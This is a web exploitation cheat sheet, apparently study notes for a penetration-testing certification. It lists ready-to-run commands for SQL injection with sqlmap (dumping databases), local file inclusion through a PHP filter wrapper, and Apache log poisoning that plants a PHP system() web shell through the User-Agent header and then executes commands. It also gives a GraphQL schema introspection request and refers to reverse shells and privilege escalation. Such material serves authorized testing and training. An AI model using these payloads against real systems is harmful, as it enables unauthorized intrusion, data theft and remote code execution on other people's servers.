ZeroBox

Web Application Exploitation & Injection

Core web exploitation vectors: SQL Injection, Local File Inclusion to RCE, JWT manipulation, and GraphQL introspection.

sqlmapcurlhashcatburpsuite

Always verify database technology and backend language before launching automated tools to prevent denial-of-service.

1. Automated SQL Injection with SQLmap

Extract databases using risk and level heuristics:

sqlmap -u "http://{TARGET_IP}/item.php?id=1" --batch --random-agent --level=3 --risk=2 --dbs

Target saved HTTP request from Burp Suite:

sqlmap -r request.txt -p username --batch --current-db --dump

2. Local File Inclusion (LFI) & Log Poisoning

Read source code via PHP wrapper:

http://{TARGET_IP}/index.php?page=php://filter/convert.base64-encode/resource=config.php

Poison Apache access log via User-Agent header:

curl -s -A "<?php system($_GET['cmd']); ?>" http://{TARGET_IP}/
curl "http://{TARGET_IP}/index.php?page=/var/log/apache2/access.log&cmd=id"

3. GraphQL Introspection

Dump all schema types and query fields:

curl -s -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name,fields{name}}}}"}' http://{TARGET_IP}/graphql | jq .

Once a reverse shell is obtained, stabilize your terminal immediately using 12. Interactive TTY Stabilization & Terminal Spawning before escalating privileges via 04. Linux Privilege Escalation Master Guide.

More CPTS notes

Keep these notes in your own private vault. Open CPTS notes in ZeroBox